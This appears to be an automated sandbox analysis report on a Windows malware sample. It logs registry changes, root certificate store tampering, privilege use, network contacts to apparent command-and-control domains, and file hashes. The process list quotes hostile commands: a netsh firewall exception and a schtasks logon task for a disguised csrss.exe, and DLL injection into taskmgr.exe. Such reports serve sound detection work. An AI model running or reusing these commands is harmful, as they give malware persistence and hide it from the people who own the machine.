| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe
"C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe"
C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe
"C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3460 -ip 3460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 816
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 185.107.56.200:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.227:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.56.107.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | af86b9e3-12a7-4b70-b838-291050caf4b8.ninhaine.com | udp |
| US | 8.8.8.8:53 | server3.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/3460-1-0x0000000002A40000-0x0000000002E8A000-memory.dmp
memory/3460-2-0x0000000002E90000-0x00000000037B6000-memory.dmp
memory/3460-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/3460-4-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/3460-5-0x0000000002E90000-0x00000000037B6000-memory.dmp
memory/444-7-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/444-8-0x0000000000400000-0x0000000000D41000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | dde0965428c655c1fabbcba5a44e7830 |
| SHA1 | b5118f55982bf9784bb34a3f0af738f7d409a5ff |
| SHA256 | 7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4 |
| SHA512 | f6b83ff23e0e7102a69bf43e723f312acb0bbf95e04d7386513cc2c5b2f9e160f0f38b179688702675ecb7c4a0782fad1f007f3db59c2104aa08a7cdcc6b2e13 |
memory/444-14-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-16-0x0000000000400000-0x0000000000D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2872-22-0x0000000000400000-0x0000000000D41000-memory.dmp
